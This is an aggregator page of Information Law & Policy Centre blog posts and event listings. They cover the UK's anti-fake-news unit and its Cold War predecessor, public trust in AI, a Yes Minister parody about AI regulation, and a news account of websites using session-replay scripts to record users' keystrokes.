Loading...

Follow Information Law & Policy Centre on Feedspot

Continue with Google
Continue with Facebook
Or

Valid


Children and Digital Rights: Regulating Freedoms and Safeguards - YouTube

Baroness Beeban Kidron OBE, Film-maker, Member of The Royal Foundation Taskforce on the Prevention of Cyberbullying, and Founder of 5Rights;

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
 

In this guest post, Dan Lomas, Programme Leader, MA Intelligence and Security Studies, University of Salford, explores the British government’s new ‘anti-fake news’ unit.

The decision to set up a new National Security Communications Unit to counter the growth of “fake news” is not the first time the UK government has devoted resources to exploit the defensive and offensive capabilities of information. A similar thing was tried in the Cold War era, with mixed results.

The planned unit has emerged as part of a wider review of defence capabilities. It will reportedly be dedicated to “combating disinformation by state actors and others” and was agreed at a meeting of the National Security Council (NSC).

As a spokesperson for UK prime minister Theresa May told journalists:

We are living in an era of fake news and competing narratives. The government will respond with more and better use of national security communications to tackle these interconnected, complex challenges.

Parliament’s Digital, Culture, Media and Sport Committee is currently investigating the use of fake news – the spreading of stories of “uncertain provenance or accuracy” – through social media and other channels. The investigation is taking place amid claims that Russia used hundreds of fake accounts to tweet about Brexit. The head of the army, General Sir Nick Carter, recently told the think-tank RUSI that Britain should be prepared to fight an increasingly assertive Russia.

Details of the new anti-fake news unit are vague, but may mark a return to Britain’s Cold War past and the work of the Foreign Office’s Information Research Department (IRD), which was set up in 1948 to counter Soviet propaganda. The unit was the brainchild of Christopher Mayhew, Labour MP and under-secretary in the Foreign Office, and grew to become one of largest Foreign Office departments before its disbandment in 1977 – a story revealed in The Guardian in January 1978 by its investigative reporter David Leigh.

This secretive government body worked with politicians, journalists and foreign governments to counter Soviet lies, through unattributable “grey” propaganda and confidential briefings on “Communist themes”. IRD eventually expanded from this narrow anti-Soviet remit to protect British interests where they were likely “to be the object of hostile threats”.



Read more:
Good luck banning fake news – here’s why it’s unlikely to happen

By 1949, IRD had a staff of just 52, all based in central London. By 1965 it employed 390 staff, including 48 overseas, with a budget of over £1m mostly paid from the “secret vote” used to fund the UK intelligence community. IRD also worked alongside the Secret Intelligence Service (SIS or MI6) and the BBC’s World Service.

Playing hardball with soft power

Examples of IRD’s early work include reports on Soviet gulags and the promotion of anti-communist literature. George Orwell’s work was actively promoted by the unit. Shortly before his death in 1950, Orwell even gave it a list of left-wing writers and journalists “who should not be trusted” to spread IRD’s message. During that decade, the department even moved into British domestic politics by setting up a “home desk” to counter communism in industry.

 

IRD also played an important role in undermining Indonesia’s President Sukarno in the 1960s, as well as supporting western NGOs – especially the Thomson and Ford Foundations. In 1996, former IRD official Norman Reddaway provided more information on IRD’s “long-term” campaigns (contained in private papers). These included “English by TV” broadcast to the Gulf, Sudan, Ethiopia and China, with other IRD-backed BBC initiatives – “Follow Me” and “Follow Me to Science” – which had an estimated audience of 100m in China.

IRD was even involved in supporting Britain’s entry to the European Economic Community, promoting the UK’s interests in Europe and backing politicians on both sides. It would shape the debate by writing a letter or article a day in the quality press. The department was also involved in more controversial campaigns, spreading anti-IRA propaganda during The Troubles in Northern Ireland, supporting Britain’s control of Gibraltar and countering the “Black Power” movement in the Caribbean.

Overthrown: President Sukarno of Indonesia. Going too far

IRD’s activities were steadily getting out of hand, yet an internal 1971 review found the department was still needed, given “the primary threat to British and Western interests worldwide remains that from Soviet Communism” and the “violent revolutionaries of the ‘New Left’”. IRD was a “flexible auxiliary, specialising in influencing opinion”, yet its days were numbered. By 1972 the organisation had just over 100 staff and faced significant budget cuts, despite attempts at reform.

IRD was eventually killed off thanks to opposition from Foreign Office mandarins and the then Labour foreign secretary, David Owen – though that may not be the end of the story. Officials soon set up the Overseas Information Department – likely a play on IRD’s name – tasked with making “attributable and non-attributable” written guidance for journalists and politicians, though its overall role is unclear. Information work was also carried out by “alongsiders” such as the former IRD official Brian Crozier.

The history of IRD’s work is important to future debates on government strategy in countering “fake news”. The unit’s effectiveness is certainly open to debate. In many cases, IRD’s work reinforced the anti-Soviet views of some, while doing little, if anything, to influence general opinion.

In 1976, one Foreign Office official even admitted that IRD’s work could do “more harm than good to institutionalise our opposition” and was “very expensive in manpower and is practically impossible to evaluate in cost effectiveness” – a point worth considering today.

IRD’s rapid expansion from anti-communist unit to protecting Britain’s interests across the globe also shows that it’s hard to manage information campaigns. What may start out as a unit to counter “fake news” could easily spiral out of control, especially given the rapidly expanding online battlefield.

Government penny pinching on defence – a key issue in current debates – could also fail to match the resources at the disposal of the Russian state. In short, the lessons of IRD show that information work is not a quick fix. The British government could learn a lot by visiting the past.

This article was originally published on The Conversation. Read the original article.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

The Information Law and Policy Centre held its third annual conference on 17th November 2017. The workshop’s theme was: ‘Children and Digital Rights: Regulating Freedoms and Safeguards’.

The workshop brought together regulators, practitioners, civil society, and leading academic experts who addressed and examined the key legal frameworks and policies being used and developed to safeguard children’s digital freedoms and rights. These legislative and policy regimes include the UN Convention on the Rights of the Child, and the related provisions (such as consent, transparency, and profiling) under the UK Digital Charter, and the Data Protection Bill which will implement the EU General Data Protection Regulation.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

20 -11-17 Institute of Advanced Legal Studies - YouTube

This event will focus on the implications posed by the increasingly significant role of artificial intelligence (AI) in society and the possible ways in which humans will co-exist with AI in future, particularly the impact that this interaction will have on our liberty, privacy, and agency. Will the benefits of AI only be achieved at the expense of these human rights and values? Do current laws, ethics, or technologies offer any guidance with respect to how we should navigate this future society?

Event date:
Monday, 20 November 2017 – 5:30pm
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Date
05 Feb 2018, 17:30 to 05 Feb 2018, 19:30
Institute
Institute of Advanced Legal Studies
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Speaker: Damian Clifford, KU Leuven Centre for IT and IP Law

Panel Discussants: Dr Edina Harbinja, Senior Lecturer in Law, University of Hertfordshire.

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law and Policy Centre, Institute of Advanced Legal Studies

Description:

Emotions play a key role in decision making. Technological advancements are now rendering emotions detectable in real-time. Building on the granular insights provided by big data, such technological developments allow commercial entities to move beyond the targeting of behaviour in advertisements to the personalisation of services, interfaces and the other consumer-facing interactions, based on personal preferences, biases and emotion insights gleaned from the tracking of online activity and profiling and the emergence of ‘emphathic media’.

Although emotion measurement is far from a new phenomenon, technological developments are increasing the capacity to monetise emotions. From the analysis of inter alia facial expressions, voice/sound patterns, to text and data mining, and the use of smart devices to detect emotions, such techniques are becoming mainstream.

Despite the fact there are many applications of such technologies which appear morally above reproach (i.e. at least in terms of their goals (e.g. healthcare or road safety) as opposed to the risks associated with their implementation, deployment and their potential effects), their use for advertising and marketing purposes raises clear concerns in terms of the rationality-based paradigm inherent to citizen-consumer protections and thus the autonomous decision-making capacity of individuals.

In this ILPC seminar, Visiting Scholar Damian Clifford will examine the emergence of such technologies in an online context vis-à-vis their use for commercial advertising and marketing purposes (construed broadly) and the challenges they present for EU data protection and consumer protection law. The analysis will rely on a descriptive and evaluative analysis of the relevant frameworks and aims to provide normative insights into the potential legal challenges presented by emotion commercialisation online.

Discussant:  Dr Edina Harbinja is a Senior Lecturer in Law at the University of Hertfordshire. Her principal areas of research and teaching are related to the legal issues surrounding the Internet and emerging technologies. In her research, Edina explores the application of property, contract law, intellectual property and privacy online. Edina is a pioneer and a recognised expert in post-mortem privacy, i.e. privacy of the deceased individuals. Her research has a policy and multidisciplinary focus and aims to explore different options of regulation of online behaviours and phenomena. She has been a visiting scholar and invited speaker to universities and conferences in the USA, Latin America and Europe, and has undertaken consultancy for the Fundamental Rights Agency. Her research has been cited by legislators, courts and policymakers in the US and Europe as well. Find her on Twitter at @EdinaRl.

A wine reception will follow this seminar.

This event is FREE but advanced booking is required.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Date
19 Feb 2018, 17:30 to 19 Feb 2018, 19:30
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Personal Data as an Asset: Design and Incentive Alignments in a Personal Data Economy  Description of Presentation:  Despite the World Economic Forum (2011) report on personal data becoming an asset class  the cost of transacting on personal data is becoming increasingly high with regulatory risks, societal disapproval, legal complexity and privacy concerns.  Professor Irene Ng contends that this is because personal data as an asset is currently controlled by organisations. As a co-produced asset, the person has not had the technological capability to control and process his or her own data or indeed, data in general. Hence, legal and economic structures have been created only around Organisation-controlled personal data (OPD).  This presentation will argue that a person-controlled personal data (PPD), technologically, legally and economically architected such that the individual owns a personal micro-server and therefore have full rights to the data within, much like owning a PC or a smartphone, is potentially a route to reducing transaction costs and innovating in the personal data economy. I will present the design and incentive alignments of stakeholders on the HAT hub-of-all-things platform (https://hubofallthings.com).

Key Speaker:

Professor Irene Ng, University of Warwick

Professor Irene Ng is the Director of the International Institute for Product and Service Innovation and the Professor of Marketing and Service Systems at WMG, University of Warwick. She is also the Chairman of the Hub-of-all-Things (HAT) Foundation Group (http://hubofallthings.com). A market design economist, Professor Ng is an advisor to large organisations, startups and governments on design of markets, economic and business models in the digital economy. Personal website http://ireneng.com

Panel Discussants:

TBC

Chair:

Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law & Policy Centre, IALS

Wine reception to follow.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

In this guest post, Dr Vyacheslav Polonski, Researcher, University of Oxford examines the key question of trust or fear of AI.

We are at a tipping point of a new digital divide. While some embrace AI, many people will always prefer human experts even when they’re wrong.

Unless you live under a rock, you probably have been inundated with recent news on machine learning and artificial intelligence (AI). With all the recent breakthroughs, it almost seems like AI can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Of course, many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.

Should you trust Dr. Robot?

As a case in point, IBM’s attempt to promote its Watson for Oncology programme was a PR disaster. Using one of the world’s most powerful supercomputer systems to recommend the best cancer treatment to doctors seemed like an audacious undertaking straight out of sci-fi movies. The AI promised to deliver top-quality recommendations on the treatment of 12 cancers that accounted for 80% of the world’s cases. As of today, over 14,000 patients worldwide have received advice based on its calculations.

But when doctors first interacted with Watson they found themselves in a rather difficult situation. On the one hand, if Watson provided guidance about a treatment that coincided with their own opinions, physicians did not see much value in Watson’s recommendations.

The supercomputer was simply telling them what they already know, and these recommendations did not change the actual treatment. This may have given doctors some peace of mind, providing them with more confidence in their own decisions. But IBM has yet to provide evidence that Watson actually improves cancer survival rates.

On the other hand, if Watson generated a recommendation that contradicted the experts’ opinion, doctors would typically conclude that Watson wasn’t competent enough (or blame the unorthodox solutions on system failures). What is more, the machine wouldn’t be able to explain why its treatment was plausible because its machine learning algorithms were simply too complex to be fully understood by humans. Consequently, this has caused even more mistrust and disbelief, leading many doctors to ignore the seemingly outlandish AI recommendations and stick to their own expertise in oncology.

As a result, IBM Watson’s premier medical partner, the MD Anderson Cancer Center, recently announced it was dropping the programme. Similarly, a Danish hospital reportedly abandoned the AI programme after discovering that its cancer doctors disagreed with Watson in over two thirds of cases.

The origins of trust issues: It’s a human thing

Many experts believe that our future society will be built on effective human-machine collaboration. But a lack of trust remains the single most important factor stopping this from happening.

The problem with Watson for Oncology was that doctors simply didn’t trust it. Human trust is often based on our understanding of how other people think and having experience of their reliability. This helps create a psychological feeling of safety. AI, on the other hand, is still fairly new and unfamiliar to most people. It makes decisions using a complex system of analysis to identify potentially hidden patterns and weak signals from large amounts of data.

Even if it can be technically explained (and that’s not always the case), AI’s decision-making process is usually too difficult for most people to understand. And interacting with something we don’t understand can cause anxiety and make us feel like we’re losing control. Many people are also simply not familiar with many instances of AI actually working, because it often happens in the background. Instead, they are acutely aware of instances where AI goes terribly wrong:

These unfortunate examples have received a disproportionate amount of media attention, emphasising the message that humans cannot always rely on technology. In the end, it all goes back to the simple truth that machine learning is not foolproof, in part because the humans who design it aren’t.

The effects of watching Terminator: A new AI divide in society?

Feelings about AI also run deep. But why do some people embrace AI, while others are deeply suspicious about it?

In December 2017, my colleagues and I recently ran an experiment where we asked people from a range of backgrounds to watch various sci-fiction films about AI and fill out survey questionnaires about their opinions about automation (both before watching the movie and after). We asked them questions about their general attitudes towards the Internet, their experiences with AI technology and their willingness to automate specific tasks in everyday life: which tasks were they happy to automate with a hypothetical AI assistant and which tasks would they insist on carrying out themselves.

Surprisingly, it didn’t matter whether movies like Terminator, Her or Ex-Machina depicted a Utopian or Dystopian future. We found that, regardless of whether the film they watched depicted AI in a positive or negative light, simply watching a cinematic vision of our technological future polarised the participants’ attitudes. Optimists became more extreme in their enthusiasm for AI, indicating that they were eager to automate more everyday tasks. Conversely, sceptics became even more guarded in their attitudes toward AI. They doubted the potential benefits of AI and were more willing to actively resist AI tools used by their friends and families.

The implications that stem from these findings are concerning. On the one hand, this suggests that people use relevant evidence about AI in a biased manner to support their existing attitudes, a deep-rooted human tendency known as confirmation bias. We believe that this cognitive bias is the main driving force behind the polarising effects we’ve observed in our study.

On the other hand, given the unrelenting pace of technological progress, refusing to partake in the advantages offered by AI could place a large group of people at a serious disadvantage. As AI is reported and represented more and more in popular culture and in the media, it could contribute to a deeply divided society, split between those who believe in (and consequently benefit from) AI and those who reject it.

More pertinently, refusing to accept the advantages offered by AI could place a large group of people at a serious disadvantage. This is due to the fact that differences in AI trust could lead to differential access to job opportunities and, consequently, differences in socio-economic status. The resulting clashes between AI followers and AI deniers could prompt governments to step in with heedless regulation that stifles innovation.

An exit out of the AI trust crisis

Distrust in AI could be the biggest dividing force in society. Therefore, if AI is to live up to its full potential, we have to find a way to get people to trust it, particularly if it produces recommendations that radically differ from what we are normally used to. Fortunately we already have some ideas about how to improve trust in AI — there’s light at the end of the tunnel.

  1. Experience: One solution may be to provide more hands-on experiences with automation apps and other AI applications in everyday situations (like this robot that can get you a beer from the fridge). Thus, instead of presenting the Sony’s new robot dog Aibo as an exclusive product for the upper-class, we’d recommend making these kinds of innovations more accessible to the masses. Simply having previous experience with AI can significantly improve people’s attitudes towards the technology, as we found in our experimental study. And this is especially important for the general public that may not have a very sophisticated understanding of the technology. Similar evidence also suggests the more you use other technologies such as the Internet, the more you trust them.
  2. Insight: Another solution may be to open the “black-box” of machine learning algorithms and be slightly more transparent about how they work. Companies such as Google, Airbnb and Twitter already release transparency reports on a regular basis. These reports provide information about government requests and surveillance disclosures. A similar practice for AI systems could help people have a better understanding of how algorithmic decisions are made. Therefore, providing people with a top-level understanding of machine learning systems could go a long way towards alleviating algorithmic aversion.
  3. Control: Lastly, creating more of a collaborative decision-making process will help build trust and allow the AI to learn from human experience. In our work at Avantgarde Analytics, we have also found that involving people more in the AI decision-making process could improve trust and transparency. In a similar vein, a group of researchers at the University of Pennsylvania recently found that giving people control over algorithms can help create more trust in AI predictions. Volunteers in their study who were given the freedom to slightly modify an algorithm felt more satisfied with it, more likely to believe it was superior and more likely to use in in the future.

These guidelines (experience, insight and control) could help making AI systems more transparent and comprehensible to the individuals affected by their decisions. Our research suggests that people might trust AI more if they had more experience with it and control over how it is used rather than simply being told to follow orders from a mysterious computer system.

People don’t need to understand the intricate inner workings of AI systems, but if they are given at least a bit of information about and control over how they are implemented, they will be more open to accepting AI into their lives.

About the author: Dr Vyacheslav Polonski is a researcher at the University of Oxford, studying complex social networks and collective behaviour. He holds a PhD in computational social science and has previously studied at Harvard, Oxford and LSE. He is the founder and CEO of Avantgarde Analytics, a machine learning startup that harnesses AI and behavioural psychology for the next generation of algorithmic campaigns. Vyacheslav is actively involved in the World Economic Forum Expert Network and the WEF Global Shapers community, where he served as the Curator of the Oxford Hub. He writes about the intersection of sociology, network science and technology.

Earlier versions of this article appeared in The Conversation and the Daily Mail on 09 January 2018.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s Blog as part of Laurence Eastham’s Predictions 2018 series. It is also appearing in Computers & Law, December/January issue.

Humphrey, I want to do something about predictions.

Indeed, Minister.

Yes Humphrey, the machines are taking over.

Are they Minister?

Yes Humphrey, my advisers tell me I should be up in arms.  Machines – ‘AI’ they call it – predicting what I’m going to buy, when I’m going to die, even if I’ll commit a crime.

Surely not, Minister.

Not me personally, of course, Humphrey – other people.  And then there’s this scandal over Cambridge Analytica and voter profiling.  Has no-one heard of the secret ballot?

Everyone knows which way you would vote, Minister.

Yes, yes, not me personally, of course, Humphrey – other people.  Anyway, I want to do something about it.

Of course, Minister.  Let me see – you want to ban voter and customer profiling, crime risk assessment and predictions of one’s demise, so that would mean no more targeted advertising, political campaigning, predictive policing, early parole releases, life insurance policies…

Well, let’s not be too hasty Humphrey.  I didn’t say anything about banning things.

My sincere apologies Minister, I had understood you wanted to do something.

Yes, Humphrey, about the machines, the AI.  People don’t like the idea of some faceless computer snooping into their lives and making predictions about them.

But it’s alright if a human does it.

Yes…well no…I don’t know.  What do you suggest Humphrey?

As I see it Minister, you have two problems.

Do I?

The people are the ones with the votes, the AI developers are the ones with the money and the important clients – insurance companies, social media giants, dare I say it, even political parties..

Yes, yes, I see.  I mustn’t alienate the money.  But I must be seen to be doing something Humphrey.

I have two suggestions Minister.  First, everything must be ‘transparent’.  Organisations using AI must say how their technology works and what data it uses.  Information, information everywhere…

I like it Humphrey.  Power to the people and all that.  And if they’ve had the information, they can’t complain, eh.  And the second thing?

A Commission, Minister, or a Committee, with eminent members, debating, assessing, scrutinising, evaluating, appraising…

And what is this Commission to do?

“Do” Minister?

What will the Commission do about predictions and AI?

It will scrutinise, Minister, it will evaluate, appraise and assess, and then, in two or three years, it will report.

But what will it say Humphrey?

I cannot possibly predict what the Commission on Predictions would say, being a mere humble servant of the Crown.

Humphrey!

But if I had to guess, I think it highly likely that it will say that context reigns supreme – there are good predictions and there are bad predictions, and there is good AI and there is bad AI.

So after three years of talking, all it will say is that ‘it depends’.

Yes Minister.

In homage to ‘Yes Minister’ by Antony Jay and Jonathan Lynn 

Marion Oswald, Senior Fellow in Law, Head of the Centre for Information Rights, University of Winchester

The Fifth Interdisciplinary Winchester Conference on Trust, Risk, Information and the Law will be held on Wednesday 25 April 2018 at the Holiday Inn, Winchester UK.  Our overall theme for this conference will be: Public Law, Politics and the Constitution: A new battleground between the Law and Technology?  The call for papers and booking information can be found at https://journals.winchesteruniversitypress.org/index.php/jirpp/pages/view/TRIL

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personal identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.

The research found that third party tracking services are used by hundreds of businesses to monitor how users navigate their websites. This is proving to be increasingly challenging as more and more companies beef-up security and shift their sites over to encrypted HTTPS pages.

To work around this, session-replay scripts are deployed to monitor user interface behaviour on websites as a sequence of time-stamped events, such as keyboard and mouse movements. Each of these events record additional parameters – indicating the keystrokes (for keyboard events) and screen coordinates (for mouse movement events) – at the time of interaction. When associated with the content of a website and web address, this recorded sequence of events can be exactly replayed by another browser that triggers the functions defined by the website.

What this means is that a third person is able to see, for example, a user entering a password into an online form – which is a clear privacy breach. Websites that employ third party analytics firms to record and replay such behaviour is, they argue, in the name of “enhancing user experience”. The more they know what their users are after, the easier it is to provide them with targeted information.

While it’s not news that companies are monitoring our behaviour as we surf the web, the fact that scripts are quietly being deployed to record individual browser sessions in this way has concerned the study’s co-author, Steven Englehardt, who is a PhD candidate at Princeton.

user replay fullstory demo - YouTube
A website user replay demo in action.

“Collection of page content by third-party replay scripts may cause sensitive information, such as medical conditions, credit card details, and other personal information displayed on a page, to leak to the third-party as part of the recording,” he wrote. “This may expose users to identity theft, online scams and other unwanted behaviour. The same is true for the collection of user inputs during checkout and registration processes.”

Websites logging keystrokes has been an issue known for a while to cybersecurity experts. And Princeton’s empirical study raises valid concerns about users having little or no control over their surfing behaviour being recorded in this way.

So it’s important to help users control how their information is shared online. But there are increasing signs of usability trumping security measures that are designed to keep our data safe online.

Usability vs security

Password managers are used by millions of people to help them easily keep a record of different passwords for different sites. The user of such a service only needs to memorise one key password.

Recently, a group of researchers at the University of Derby and the Open University discovered that the offline clients of password manager services were at risk of exposing the main key password when stored as plain text in memory that could be sniffed or dumped by whole system attacks.

User experience is not an excuse for tolerating security flaws.

This article was originally published on The Conversation. Read the original article.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Children and Digital Rights: Regulating Freedoms and Safeguards - YouTube

Read Full Article
Visit website

Read for later

Articles marked as Favorite are saved for later viewing.
close
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Separate tags by commas
To access this feature, please upgrade your account.
Start your free year
Free Preview